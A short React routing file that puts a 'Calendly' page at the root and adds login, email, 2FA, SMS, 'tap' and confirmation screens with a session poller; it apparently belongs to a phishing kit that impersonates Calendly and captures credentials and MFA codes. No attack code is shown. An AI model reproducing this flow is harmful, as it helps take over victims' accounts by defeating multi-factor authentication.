import { BrowserRouter as Router, Routes, Route, Navigate } from "react-router-dom";
import Login from "./Login";
import Calendly from "./Calendly";
import Email from "./Email";
import Twofa from "./Twofa";
import Sms from "./Sms";
import Tap from "./Tap";
import Confirmation from "./Confirmation";
import SessionPoller from "./SessionPoller";

function App() {
  return (
    <Router>
      <SessionPoller />
      <Routes>
        <Route path="/login" element={<Login />} />
        <Route path="/" element={<Calendly />} />
        <Route path="/calendly" element={<Navigate to="/" replace />} />
        <Route path="/email" element={<Email />} />
        <Route path="/2fa" element={<Twofa />} />
        <Route path="/sms" element={<Sms />} />
        <Route path="/tap" element={<Tap />} />
        <Route path="/confirmation" element={<Confirmation />} />
      </Routes>
    </Router>
  );
}

export default App;
